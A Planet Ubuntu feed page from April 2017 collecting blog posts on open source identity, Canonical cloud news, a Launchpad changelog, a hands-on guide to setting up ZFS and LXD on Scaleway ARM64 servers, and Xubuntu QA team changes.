Most recent items from Ubuntu feeds:
Jono Bacon: Anonymous Open Source Projects from Planet Ubuntu

Today Solomon asked an interesting question on Twitter:

He made it clear he is not advocating for this view, just a thought experiment. I had, well, a few thoughts on this.

I tend to think of open source projects in three broad buckets.

Firstly, we have the overall workflow in which the community works together to build things. This includes your code review processes, issue management, translations workflow, event strategy, governance, and other pieces.

Secondly, there are the individual contributions. This is how we assess what we want to build, what quality looks like, how we build modularity, and other elements.

Thirdly, there is identity which covers the identity of the project and the individuals who contribute to it. Solomon taps into this third component.

Identity

While the first two components, workflow and contributions, are clearly important in defining what you want to work on and how you build it, identity is more subtle.

I think identity plays a few different roles at the individual level.

Firstly, it helps to build reputation. Open source communities are at a core level meritocracies: contributions are assessed on their value, and the overall value of the contributor is based on their merits. Now, yes, I know some of you will balk at whether open source communities are actually meritocracies. The thing is, too many people treat “meritocracy” as a framework or model: it isn’t. It is more of a philosophy…a star that we move towards.

It is impossible to build a meritocracy without some form of identity attached to the contribution. We need to have a mapping between each contribution and the same identity that delivered it: this helps that individual build their reputation as they deliver more and more contributions. This also helps them flow from being a new contributor, to a regular, and then to a leader.

This leads to my second point. Identity is also critical for accountability. Now, when I say accountability we tend to think of someone being responsible for their actions. Sure, this is the case, but accountability also plays an important and healthy role in people receiving peer feedback on their work.

According to Google Images search, “accountability” requires lots of fist bumps.
Open source communities are kinda weird places to be. It is easy to forget that (a) joining a community, (b) making a contribution, (c) asking for help, (d) having your contribution critically reviewed, and (e) solving problems, all happens out in the open, for all to see. This can be remarkably weird and stressful for people new to or unfamiliar with open source, and on a bed of the cornucopia of human insecurities about looking stupid, embarrassing yourself etc. While I have never been to one (honest), I imagine this is what it must be like going to a nudist colony: everything out on display, both good and bad.

All of this rolls up to identity playing an important role for building the fabric of a community, for effective peer review, and the overall growth of individual participants (and thus the network effect of the community).

Real Names vs. Handles

If we therefore presume identity is important, do we require that identity to be a real name (e.g. “Jono Bacon”) or a handle (e.g. “MetalDude666”)? – not my actual handle, btw.

We have all said this at some point.

In terms of the areas I presented above, such as building reputation, accountability, and peer review, this can all be accomplished if people use handles, provided that there is some way of knowing that “MetalDude666” is the same person each time. Many gaming communities have players who build remarkable reputations and accountability and no one knows who they really are, just their handles.

Where things get trickier is assuring the same quality of community experience for those who use real names and those who use handles in the same community. On core infrastructure (such as code hosting, communication channels, websites, etc) this can typically be assured. It can get trickier with areas such as real-world events. For example, if the community has an in-person event, the folks with the handles may not feel comfortable attending so as to preserve their anonymity. Given how key these kinds of events can be to building relationships, it can therefore result in a social/collaborative delta between those with real names and those with handles.

So, in answer to Solomon’s question, I do think identity is critical, but it could be all handles if required. What is key is to either (a) require only handles/real names (which is tough), or (b) provide very careful community strategy and execution to reduce the delta of experience between those with real names and handles (tough, but easier).

So, what do you think, folks? Do you agree with me, or am I speaking nonsense? Can you share great examples of anonymous open source communities? Are there elements I missed in my assessment here? Share them in the comments below!

about 21 hours ago

Ubuntu Insights: Cloud Chatter: April 2017 from Planet Ubuntu

Welcome to our April edition. We begin with our recent release of Ubuntu 17.04, supporting the widest range of container capabilities. We have a selection of Kubernetes webinars for you to watch, or get up to speed with some in-depth tutorials. Read about our exciting partnership announcements with Oracle, City Network, AWS and Unitas Global. Discover our plans for our upcoming presence at the OpenStack Summit in Boston next month. And finally, enjoy our roundup of industry news.

Ubuntu 17.04 supports widest range of container capabilities
This month marked the 26th release of Ubuntu, entitled 17.04 Zesty Zapus, offering the most complete portfolio of container support in a Linux distribution. This includes snaps for singleton apps, LXD by Canonical for lightweight VM-style machine containers, and auto-updating Docker snap packages available in stable, candidate, beta and edge channels. The Canonical Distribution of Kubernetes 1.6, representing the very latest upstream container infrastructure, has 100% compatibility with Google’s hosted Kubernetes service GKE.
Ubuntu 17.04 also includes OpenStack’s latest Ocata release, which is also available on Ubuntu 16.04 LTS via Canonical’s public Cloud Archive. Canonical’s OpenStack offering supports upgrades of running clouds without workload interruption. The introduction of Cells v2 in this release ensures that new clouds have a consistent way to scale from small to very large as capacity requirements change.
Furthermore there is increased network performance for clouds and guests with the Linux 4.10 kernel. Learn more

GPUs and Kubernetes for Deep Learning
The Canonical Distribution of Kubernetes is the only distribution that natively supports GPUs, making it ideal for managing Deep Learning and Media workloads. Our latest webinar discusses how such artificial intelligence can be achieved using Kubernetes, nVidia GPUs, and the operation toolbox provided by Canonical. Watch the webinar
Get up and running with Kubernetes
Our Kubernetes webinar series will be covering a range of operational tasks over the next few months. These will include upgrades, backups, snapshots, scalability, and other operational concerns that will allow you to completely manage your Kubernetes cluster(s) with confidence. The available webinars in the series so far include:

Getting started with the Canonical Distribution of Kubernetes – watch on-demand
Learn the secrets of validation and testing your Kubernetes cluster – watch on-demand
Painless Kubernetes upgrades – register now

Unitas Global and Canonical provide Fully-Managed Enterprise OpenStack
Unitas Global, the leading enterprise hybrid cloud solution provider, and Canonical, announced they will provide a new fully managed and hosted OpenStack private cloud to enterprise clients around the world. This partnership along with Unitas Global’s large ecosystem of system integrators and partners will enable customers to choose an end to end infrastructure solution to design, build, and integrate custom private cloud infrastructure based on OpenStack. Learn more
OpenStack public cloud, from Stockholm to Dubai and everywhere between
City Network, a leading European provider of OpenStack infrastructure-as-a-service (IaaS), has joined the Ubuntu Certified Public Cloud programme. Through its public cloud service ‘City Cloud’, companies across the globe can purchase server and storage capacity as needed, paying for the capacity they use and leveraging the flexibility and scalability of the OpenStack platform. With dedicated and OpenStack-based City Cloud nodes in the US, Europe and Asia, City Network also recently launched in Dubai. Learn more.
Certified Ubuntu Images available on Oracle Bare Metal Cloud Service
Certified Ubuntu images are now available in the Oracle Bare Metal Cloud Services, providing developers with compute options ranging from single to 16 OCPU virtual machines (VMs) to high-performance, dedicated bare metal compute instances. This is in addition to the image already offered on Oracle Compute Cloud Service and maintains the ability for enterprises to add Canonical-backed Ubuntu Advantage Support and Systems Management. Oracle and Canonical customers now have access to the latest Ubuntu features, compliance accreditations and security updates. Learn more
Ubuntu on AWS gets serious performance boost with AWS-tuned kernel
Ubuntu Cloud Images for Amazon have been enabled with the AWS-tuned Ubuntu kernel by default. The AWS-tuned Ubuntu kernel will receive the same level of support and security maintenance as all supported Ubuntu kernels for the duration of the Ubuntu 16.04 LTS. The most notable highlights for this kernel include: Up to 30% faster kernel boot speeds, full support for Elastic Network Adapter (ENA), increased I/O performance for i3 instances and more! Learn more
Ubuntu 12.04 goes end-of-life
Following the end-of-life of Ubuntu 12.04 LTS on Friday, April 28, 2017, Canonical is offering Ubuntu 12.04 ESM (Extended Security Maintenance), which provides important security fixes for the kernel and the most essential user space packages in Ubuntu 12.04. These updates are delivered in a secure, private archive exclusively available to Ubuntu Advantage customers on a per-node or per-hour basis.
For more information, read our FAQs or watch our latest webinar.

Preparing for a great show at OpenStack Summit Boston
We’ll be in Boston, from the 7th-12th May, at the OpenStack Summit. Join us at the Ubuntu booth and talk with us about your business’s cloud needs or find out about our cloud and container solutions, from LXD to Docker and Kubernetes with our featured demos. We’ll also be running some hands-on Telco and Container-specific workshops, as well as delivering a range of informative speaking sessions within the summit agenda. Book a meeting with our Executive Team or learn more about what we have planned.
Top posts from Insights

[News] Scalable, Secure Access to Data with DBaaS on IBM LinuxONE
[Blog] General availability of Kubernetes 1.6 on Ubuntu
[Tutorial] How we commoditized GPUs for Kubernetes
[Whitepaper] The no-nonsense way to accelerate your business with containers
[eBook] What IT pros need to know about server provisioning
[Video tutorial] How to install MAAS on your machine

OpenStack, SDN & NFV

How robots will retool the server industry
What’s new in OpenStack Ocata
OPNFV, the Open Source Project for Integrated Testing of Full, Next-Generation Networking Stack, Issues its Fourth Release

Containers & Storage

Is it time to buy into container management platforms
Enterprise container DevOps steps up its game with Kubernetes 1.6
The major changes that make Docker container services enterprise-ready

Big data / Machine Learning / Deep Learning

New AI Chips to Give GPUs a Run for Deep Learning Money
Will the cloud save big data?
Why Securing Big Data is a Big Deal

about 22 hours ago

Launchpad News: Launchpad news, November 2015 – April 2017 from Planet Ubuntu

Well, it’s been a while!  Since we last posted a general update, the Launchpad team has become part of Canonical’s Online Services department, so some of our efforts have gone into other projects.  There’s still plenty happening with Launchpad, though, and here’s a changelog-style summary of what we’ve been up to.

Answers

Lock down question title and description edits from random users
Prevent answer contacts from editing question titles and descriptions
Prevent answer contacts from editing FAQs

Blueprints

Optimise SpecificationSet.getStatusCountsForProductSeries, fixing Product:+series timeouts
Add sprint deletion support (#2888)
Restrict blueprint count on front page to public blueprints

Build farm

Add fallback if nominated architecture-independent architecture is unavailable for building (#1530217)
Try to load the nbd module when starting launchpad-buildd (#1531171)
Default LANG/LC_ALL to C.UTF-8 during binary package builds (#1552791)
Convert buildd-manager to use a connection pool rather than trying to download everything at once (#1584744)
Always decode build logtail as UTF-8 rather than guessing (#1585324)
Move non-virtualised builders to the bottom of /builders; Ubuntu is now mostly built on virtualised builders
Pass DEB_BUILD_OPTIONS=noautodbgsym during binary package builds if we have not been told to build debug symbols (#1623256)

Bugs

Use standard milestone ordering for bug task milestone choices (#1512213)
Make bug activity records visible to anonymous API requests where appropriate (#991079)
Use a monospace font for “Add comment” boxes for bugs, to match how the comments will be displayed (#1366932)
Fix BugTaskSet.createManyTasks to map Incomplete to its storage values (#1576857)
Add basic GitHub bug linking (#848666)
Prevent rendering of private team names in bugs feed (#1592186)
Update CVE database XML namespace to match current file on cve.mitre.org
Fix Bugzilla bug watches to support new versions that permit multiple aliases
Sort bug tasks related to distribution series by series version rather than series name (#1681899)

Code

Remove always-empty portlet from Person:+branches (#1511559)
Fix OOPS when editing a Git repository with over a thousand refs (#1511838)
Add Git links to DistributionSourcePackage:+branches and DistributionSourcePackage:+all-branches (#1511573)
Handle prerequisites in Git-based merge proposals (#1489839)
Fix OOPS when trying to register a Git merge with a target path but no target repository
Show an “Updating repository…” indication when there are pending writes
Launchpad’s Git hosting backend is now self-hosted
Fix setDefaultRepository(ForOwner) to cope with replacing an existing default (#1524316)
Add “Configure Code” link to Product:+git
Fix Git diff generation crash on non-ASCII conflicts (#1531051)
Fix stray link to +editsshkeys on Product:+configure-code when SSH keys were already registered (#1534159)
Add support for Git recipes (#1453022)
Fix OOPS when adding a comment to a Git-based merge proposal without using AJAX (#1536363)
Fix shallow git clones over HTTPS (#1547141)
Add new “Code” portlet on Product:+index to make it easier to find source code (#531323)
Add missing table around widget row on Product:+configure-code, so that errors are highlighted properly (#1552878)
Sort GitRepositorySet.getRepositories API results to make batching reliable (#1578205)
Show recent commits on GitRef:+index
Show associated merge proposals in Git commit listings
Show unmerged and conversation-relevant Git commits in merge proposal views (#1550118)
Implement AJAX revision diffs for Git
Fix scanning branches with ghost revisions in their ancestry (#1587948)
Fix decoding of Git diffs involving non-UTF-8 text that decodes to unpaired surrogates when treated as UTF-8 (#1589411)
Fix linkification of references to Git repositories (#1467975)
Fix +edit-status for Git merge proposals (#1538355)
Include username in git+ssh URLs (#1600055)
Allow linking bugs to Git-based merge proposals (#1492926)
Make Person.getMergeProposals have a constant query count on the webservice (#1619772)
Link to the default git repository on Product:+index (#1576494)
Add Git-to-Git code imports (#1469459)
Improve preloading of {Branch,GitRepository}.{landing_candidates,landing_targets}, fixing various timeouts
Export GitRepository.getRefByPath (#1654537)
Add GitRepository.rescan method, useful in cases when a scan crashed

Infrastructure

Launchpad’s SSH endpoints (bazaar.launchpad.net, git.launchpad.net, upload.ubuntu.com, and ppa.launchpad.net) now support newer key exchange and MAC algorithms, allowing compatibility with OpenSSH >= 7.0 (#1445619)
Make cross-referencing code more efficient for large numbers of IDs (#1520281)
Canonicalise path encoding before checking a librarian TimeLimitedToken (#677270)
Fix Librarian to generate non-cachable 500s on missing storage files (#1529428)
Document the standard DELETE method in the apidoc (#753334)
Add a PLACEHOLDER account type for use by SSO-only accounts
Add support to +login for acquiring discharge macaroons from SSO via an OpenID exchange (#1572605)
Allow managing SSH keys in SSO
Re-raise unexpected HTTP errors when talking to the GPG key server
Ensure that the production dump is usable before destroying staging
Log SQL statements as Unicode to avoid confusing page rendering when the visible_render_time flag is on (#1617336)
Fix the librarian to fsync new files and their parent directories
Handle running Launchpad from a Git working tree
Handle running Launchpad on Ubuntu 16.04 (upgrade currently in progress)
Fix delete_unwanted_swift_files to not crash on segments (#1642411)
Update database schema for PostgreSQL 9.5 and 9.6
Check fingerprints of keys received from the keyserver rather than trusting it implicitly

Registry

Make public SSH key records visible to anonymous API requests (#1014996)
Don’t show unpublished packages or package names from private PPAs in search results from the package picker (#42298, #1574807)
Make Person.time_zone always be non-None, allowing us to easily show the edit widget even for users who have never set their time zone (#1568806)
Let latest questions, specifications and products be efficiently calculated
Let project drivers edit series and productreleases, as series drivers can; project drivers should have series driver power over all series
Fix misleading messages when joining a delegated team
Allow team privacy changes when referenced by CodeReviewVote.reviewer or BugNotificationRecipient.person
Don’t limit Person:+related-projects to a single batch

Snappy

Add webhook support for snaps (#1535826)
Allow deleting snaps even if they have builds
Provide snap builds with a proxy so that they can access external network resources
Add support for automatically uploading snap builds to the store (#1572605)
Update latest snap builds table via AJAX
Add option to trigger snap builds when top-level branch changes (#1593359)
Add processor selection in new snap form
Add option to automatically release snap builds to store channels after upload (#1597819)
Allow manually uploading a completed snap build to the store
Upload *.manifest files from builders as well as *.snap (#1608432)
Send an email notification for general snap store upload failures (#1632299)
Allow building snaps from an external Git repository
Move upload to FAILED if its build was deleted (e.g. because of a deleted snap) (#1655334)
Consider snap/snapcraft.yaml and .snapcraft.yaml as well as snapcraft.yaml for new snaps (#1659085)
Add support for building snaps with classic confinement (#1650946)
Fix builds_for_snap to avoid iterating over an unsliced DecoratedResultSet (#1671134)
Add channel track support when uploading snap builds to the store (contributed by Matias Bordese; #1677644)

Soyuz (package management)

Remove some more uses of the confusing .dsc component; add the publishing component to SourcePackage:+index in compensation
Add include_meta option to SPPH.sourceFileUrls, paralleling BPPH.binaryFileUrls
Kill debdiff after ten minutes or 1GiB of output by default, and make sure we clean up after it properly (#314436)
Fix handling of << and >> dep-waits
Allow PPA admins to set external_dependencies on individual binary package builds (#671190)
Fix NascentUpload.do_reject to not send an erroneous Accepted email (#1530220)
Include DEP-11 metadata in Release file if it is present
Consistently generate Release entries for uncompressed versions of files, even if they don’t exist on the filesystem; don’t create uncompressed Packages/Sources files on the filesystem
Handle Build-Depends-Arch and Build-Conflicts-Arch from SPR.user_defined_fields in Sources generation and SP:+index (#1489044)
Make index compression types configurable per-series, and add xz support (#1517510)
Use SHA-512 digests for GPG signing where possible (#1556666)
Re-sign PPAs with SHA-512
Publish by-hash index files (#1430011)
Show SHA-256 checksums rather than MD5 on DistributionSourcePackageRelease:+files (#1562632)
Add a per-series switch allowing packages in supported components to build-depend on packages in unsupported components, used for Ubuntu 16.04 and later
Expand archive signing to kernel modules (contributed by Andy Whitcroft; #1577736)
Uniquely index PackageDiff(from_source, to_source) (part of #1475358)
Handle original tarball signatures in source packages (#1587667)
Add signed checksums for published UEFI/kmod files (contributed by Andy Whitcroft; #1285919)
Add support for named authentication tokens for private PPAs
Show explicit add-apt-repository command on Archive:+index (#1547343)
Use a per-archive OOPS timeline in archivepublisher scripts
Link to package versions on DSP:+index using fmt:url rather than just a relative link to the version, to avoid problems with epochs (#1629058)
Fix RepositoryIndexFile to gzip without timestamps
Fix Archive.getPublishedBinaries API call to have a constant query count (#1635126)
Include the package name in package copy job OOPS reports and emails (#1618133)
Remove headers from Contents files (#1638219)
Notify the Changed-By address for PPA uploads if the .changes contains “Launchpad-Notify-Changed-By: yes” (#1633608)
Accept .debs containing control.tar.xz (#1640280)
Add Archive.markSuiteDirty API call to allow requesting that a given archive/suite be published
Don’t allow cron-control to interrupt publish-ftpmaster part-way through (#1647478)
Optimise non-SQL time in PublishingSet.requestDeletion (#1682096)
Store uploaded .buildinfo files (#1657704)

Translations

Allow TranslationImportQueue to import entries from file objects rather than having to read arbitrarily-large files into memory (#674575)

Miscellaneous

Use gender-neutral pronouns where appropriate
Self-host the Ubuntu webfonts (#1521472)
Make the beta and privacy banners float over the rest of the page when scrolling
Upgrade to pytz 2016.4 (#1589111)
Publish Launchpad’s code revision in an X-Launchpad-Revision header
Truncate large picker search results rather than refusing to display anything (#893796)
Sync up the lists footer with the main webapp footer a bit (#1679093)

1 day ago

Simos Xenitellis: A closer look at the new ARM64 Scaleway servers and LXD from Planet Ubuntu

Scaleway has been offering ARM (armv7) cloud servers (baremetal) since 2015 and now they have ARM64 (armv8, from Cavium) cloud servers (through KVM, not baremetal).
But can you run LXD on them? Let’s see.
Launching a new server

We go through the management panel and select to create a new server. At the moment, only the Paris datacenter has availability of ARM64 servers and we select ARM64-2GB.
They use Cavium ThunderX hardware, and those boards have up to 48 cores. You can allocate either 2, 4, or 8 cores, for 2GB, 4GB, and 8GB RAM respectively. KVM is the virtualization platform.

There is an option of either Ubuntu 16.04 or Debian Jessie. We try Ubuntu.
It takes under a minute to provision and boot the server.
Connecting to the server

It runs Linux 4.9.23. Also, the disk is vda, specifically, /dev/vda. That is, there is no partitioning and the filesystem takes over the whole device.

Here is /proc/cpuinfo and uname -a. These show the two cores (out of the 48) provided through KVM. The BogoMIPS are really Bogo on these platforms, so do not take them at face value.

Currently, Scaleway does not have their own mirror of the distribution packages but uses ports.ubuntu.com instead. It’s 16ms away (ping time).

Depending on where you are, the ping times for google.com and www.google.com tend to differ. google.com redirects to www.google.com, so it somewhat makes sense that google.com reacts faster. At other locations (a different country), it could be the other way round.

This is /var/log/auth.log, and already there are some hackers trying to brute-force SSH. They have been trying with username ubnt. Note to self: do not use ubnt as the username for the non-root account.
The default configuration for the SSH server on Scaleway is to allow password authentication. You need to change this at /etc/ssh/sshd_config to look like
# Change to no to disable tunnelled clear text passwords
PasswordAuthentication no
Originally, the line was commented out and defaulted to yes.
Finally, run
sudo systemctl reload sshd
This will not break your existing SSH session (even restart will not break your existing SSH session, how cool is that?). Now, you can create your non-root account. To get that user to sudo as root, you need to usermod -a -G sudo myusername.
There is a recovery console, accessible through the Web management screen. For this to work, the panel says that “You must first login and set a password via SSH to use this serial console.” In reality, the root account already has a password set, and this password is stored in /root/.pw. It is not known how strong this password is. Therefore, when you boot a cloud server on Scaleway, do the following (a minimal sketch follows this list):

Disable PasswordAuthentication for SSH as shown above and reload the sshd configuration. You are supposed to have already added your SSH public key in the Scaleway Web management screen BEFORE starting the cloud server.
Change the root password so that it is not the one found at /root/.pw. Store that password somewhere safe, because it is needed if you want to connect through the recovery console.
Create a non-root user that can sudo and can do PubkeyAuthentication, preferably with a username other than ubnt.
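A minimal sketch of these three steps (myusername is a placeholder; adapt as needed):
# Disable password authentication for SSH and reload the configuration
sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
sudo systemctl reload sshd
# Change the root password so it no longer matches the one in /root/.pw
sudo passwd root
# Create a non-root user that can sudo
sudo adduser myusername
sudo usermod -a -G sudo myusername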

Setting up ZFS support
The Ubuntu Linux kernels at Scaleway do not have ZFS support and you need to compile as a kernel module according to the instructions at https://github.com/scaleway/kernel-tools.
Actually, those instructions are apparently now obsolete for newer versions of the Linux kernel, and you need to compile and install both spl and zfs manually.
Naturally, when you compile spl and zfs, you can create .deb packages that can be installed in a nice and clean way. However, spl and zfs originally create .rpm packages and then call alien to convert them to .deb packages. There we hit an alien bug (no pun intended) which gives the error zfs-0.6.5.9-1.aarch64.rpm is for architecture aarch64 ; the package cannot be built on this system, which is weird since we are only working on aarch64.
The running Linux kernel on Scaleway for these ARM64 SoCs has its important files available at http://mirror.scaleway.com/kernel/aarch64/4.9.23-std-1/
Therefore, run as root the following:
# Determine versions
arch="$(uname -m)"
release="$(uname -r)"
upstream="${release%%-*}"
local="${release#*-}"

# Get kernel sources
mkdir -p /usr/src
wget -O "/usr/src/linux-${upstream}.tar.xz" "https://cdn.kernel.org/pub/linux/kernel/v4.x/linux-${upstream}.tar.xz"
tar xf "/usr/src/linux-${upstream}.tar.xz" -C /usr/src/
ln -fns "/usr/src/linux-${upstream}" /usr/src/linux
ln -fns "/usr/src/linux-${upstream}" "/lib/modules/${release}/build"

# Get the kernel's .config and Module.symvers files
wget -O "/usr/src/linux/.config" "http://mirror.scaleway.com/kernel/${arch}/${release}/config"
wget -O /usr/src/linux/Module.symvers "http://mirror.scaleway.com/kernel/${arch}/${release}/Module.symvers"

# Set the LOCALVERSION to the locally running local version (or edit the file manually)
printf 'CONFIG_LOCALVERSION="%s"\n' "${local:+-$local}" >> /usr/src/linux/.config

# Let's get ready to compile. The following are essential for the kernel module compilation.
apt install -y build-essential
apt install -y libssl-dev
make -C /usr/src/linux prepare modules_prepare

# Now, let's grab the latest spl and zfs (see http://zfsonlinux.org/).
cd /usr/src/
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-0.6.5.9/spl-0.6.5.9.tar.gz
wget https://github.com/zfsonlinux/zfs/releases/download/zfs-0.6.5.9/zfs-0.6.5.9.tar.gz

# Install some dev packages that are needed for spl and zfs,
apt install -y uuid-dev
apt install -y dh-autoreconf
# Let's do spl first
tar xvfa spl-0.6.5.9.tar.gz
cd spl-0.6.5.9/
./autogen.sh
./configure # Takes about 2 minutes
make # Takes about 1:10 minutes
make install
cd ..

# Let's do zfs next
tar xvfa zfs-0.6.5.9.tar.gz
cd zfs-0.6.5.9/
./autogen.sh
./configure # Takes about 6:10 minutes
make # Takes about 13:20 minutes
make install

# Let's get ZFS loaded
depmod -a
ldconfig
modprobe zfs
zfs list
zpool list
And that’s it! The last two commands will show that there are no datasets or pools available (yet), meaning that it all works.
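For reference, the expected output at this point looks roughly like the following (exact wording may vary between ZFS versions):
# zfs list
no datasets available
# zpool list
no pools available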
Setting up LXD
We are going to use a file (with ZFS) as the storage file. Let’s check what space we have left for this (from the 50GB disk),
root@scw-ubuntu-arm64:~# df -h /
Filesystem      Size  Used Avail Use% Mounted on
/dev/vda         46G  2.0G   42G   5% /
Initially, it was only 800MB used, now it is 2GB used. Let’s allocate 30GB for LXD.
LXD is not preinstalled on the Scaleway image (other VPS providers already have LXD installed). Therefore,
apt install lxd
Then, we can run lxd init. There is a weird situation when you run lxd init for the first time: it takes quite some time before the first questions appear (choose storage backend, etc). In fact, it takes 1:42 minutes before you are prompted for the first question. When you subsequently run lxd init, you get the first question at once. lxd init does quite a bit of work the first time around, and I did not look into what it is.
root@scw-ubuntu-arm64:~# lxd init
Name of the storage backend to use (dir or zfs) [default=zfs]:
Create a new ZFS pool (yes/no) [default=yes]?
Name of the new ZFS pool [default=lxd]:
Would you like to use an existing block device (yes/no) [default=no]?
Size in GB of the new loop device (1GB minimum) [default=15]: 30
Would you like LXD to be available over the network (yes/no) [default=no]?
Do you want to configure the LXD bridge (yes/no) [default=yes]?
Warning: Stopping lxd.service, but it can still be activated by:
  lxd.socket

LXD has been successfully configured.
root@scw-ubuntu-arm64:~#
Now, let’s run lxc list. This will first create the client certificate. There is quite a bit of cryptography going on, and it takes a lot of time.
ubuntu@scw-ubuntu-arm64:~$ time lxc list
Generating a client certificate. This may take a minute...
If this is your first time using LXD, you should also run: sudo lxd init
To start your first container, try: lxc launch ubuntu:16.04

+------+-------+------+------+------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+------+-------+------+------+------+-----------+

real    5m25.717s
user    5m25.460s
sys    0m0.372s
ubuntu@scw-ubuntu-arm64:~$
It is weird and warrants closer examination. In any case,
ubuntu@scw-ubuntu-arm64:~$ cat /proc/sys/kernel/random/entropy_avail
2446
ubuntu@scw-ubuntu-arm64:~$
Creating containers
Let’s create a container. We are going to do each step at a time, in order to measure the time it takes to complete.
ubuntu@scw-ubuntu-arm64:~$ time lxc image copy ubuntu:x local:
Image copied successfully!         

real    1m5.151s
user    0m1.244s
sys    0m0.200s
ubuntu@scw-ubuntu-arm64:~$
Out of the 65 seconds, 25 seconds was the time to download the image and the rest (40 seconds) was for initialization before the prompt was returned.
Let’s see how long it takes to launch a container.
ubuntu@scw-ubuntu-arm64:~$ time lxc launch ubuntu:x c1
Creating c1
Starting c1
error: Error calling 'lxd forkstart c1 /var/lib/lxd/containers /var/log/lxd/c1/lxc.conf': err='exit status 1'
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
  lxc 20170428125239.730 ERROR lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
  lxc 20170428125239.730 ERROR lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
  lxc 20170428125239.730 ERROR lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
  lxc 20170428125240.408 ERROR lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
  lxc 20170428125240.408 ERROR lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".

Try `lxc info --show-log local:c1` for more info

real    0m21.347s
user    0m0.040s
sys    0m0.048s
ubuntu@scw-ubuntu-arm64:~$
What this means is that the Scaleway Linux kernel somehow does not have all the AppArmor (“aa”) features that LXD requires. If we want to continue, we must explicitly configure the container to accept this situation.
What features are missing?
ubuntu@scw-ubuntu-arm64:~$ lxc info --show-log local:c1
Name: c1
Remote: unix:/var/lib/lxd/unix.socket
Architecture: aarch64
Created: 2017/04/28 12:52 UTC
Status: Stopped
Type: persistent
Profiles: default

Log:

            lxc 20170428125239.730 WARN     lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:218 - Incomplete AppArmor support in your kernel
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:220 - If you really want to start this container, set
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:221 - lxc.aa_allow_incomplete = 1
            lxc 20170428125239.730 ERROR    lxc_apparmor - lsm/apparmor.c:apparmor_process_label_set:222 - in your container configuration file
            lxc 20170428125239.730 ERROR    lxc_sync - sync.c:__sync_wait:57 - An error occurred in another process (expected sequence number 5)
            lxc 20170428125239.730 ERROR    lxc_start - start.c:__lxc_start:1346 - Failed to spawn container "c1".
            lxc 20170428125240.408 ERROR    lxc_conf - conf.c:run_buffer:405 - Script exited with status 1.
            lxc 20170428125240.408 ERROR    lxc_start - start.c:lxc_fini:546 - Failed to run lxc.hook.post-stop for container "c1".
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.
            lxc 20170428125240.409 WARN     lxc_commands - commands.c:lxc_cmd_rsp_recv:172 - Command get_cgroup failed to receive response: Connection reset by peer.

ubuntu@scw-ubuntu-arm64:~$
Two hints here: some issue with process_label_set, and with get_cgroup.
Let’s allow incomplete AppArmor support for now, and start the container:
ubuntu@scw-ubuntu-arm64:~$ lxc config set c1 raw.lxc 'lxc.aa_allow_incomplete=1'
ubuntu@scw-ubuntu-arm64:~$ time lxc start c1

real    0m0.577s
user    0m0.016s
sys    0m0.012s
ubuntu@scw-ubuntu-arm64:~$ lxc list
+------+---------+------+------+------------+-----------+
| NAME |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+------+------+------------+-----------+
| c1   | RUNNING |      |      | PERSISTENT | 0         |
+------+---------+------+------+------------+-----------+
ubuntu@scw-ubuntu-arm64:~$ lxc list
+------+---------+-----------------------+------+------------+-----------+
| NAME |  STATE  |         IPV4          | IPV6 |    TYPE    | SNAPSHOTS |
+------+---------+-----------------------+------+------------+-----------+
| c1   | RUNNING | 10.237.125.217 (eth0) |      | PERSISTENT | 0         |
+------+---------+-----------------------+------+------------+-----------+
ubuntu@scw-ubuntu-arm64:~$
Let’s run nginx in the container.
ubuntu@scw-ubuntu-arm64:~$ lxc exec c1 -- sudo --login --user ubuntu
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

ubuntu@c1:~$ sudo apt update
Hit:1 http://ports.ubuntu.com/ubuntu-ports xenial InRelease
...
37 packages can be upgraded. Run 'apt list --upgradable' to see them.
ubuntu@c1:~$ sudo apt install nginx
...
ubuntu@c1:~$ exit
ubuntu@scw-ubuntu-arm64:~$ curl http://10.237.125.217/
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
...
ubuntu@scw-ubuntu-arm64:~$
That’s it! We are running LXD on Scaleway and their new ARM64 servers. The issues should be fixed in order to have a nicer user experience.

1 day ago

Costales: Ubuntu y otras hierbas S01E01 [videopodcast] [spanish] from Planet Ubuntu

In my first videopodcast, the topic has some real substance: Ubuntu kills Unity and the phone. Click to watch the video. Link to the videopodcast. Link to the podcast (audio only).

2 days ago

Xubuntu: Xubuntu Quality Assurance team is spreading out from Planet Ubuntu

Up until the start of the 17.04 cycle, the Xubuntu Quality Assurance team had been led by one person. During the last cycle, that person needed a break. The recent addition of Dave Pearson to the team meant we were in a position to call on someone else to lead the team.
Today, we’re pleased to announce that Dave will be carrying on as a team lead. However, starting with the artfully named Artful Aardvark cycle, we will migrate to a Quality Assurance team with two leads who will be sharing duties during development cycles.
While Dave was in control of the show during 17.04, Kev was spending more time upstream with Xfce, involving himself in testing GTK3 ports with Simon. The QA team plans to continue this split roughly from this point: Dave will be running the daily Xubuntu QA and Kev will focus more on the QA for Xfce. It is unlikely that most of you will see much change, given that for the most part we’re quiet during a cycle (QA team notes: even if the majority of -dev mailing list posts come from us…) – other than shouting when things need you all to join in.
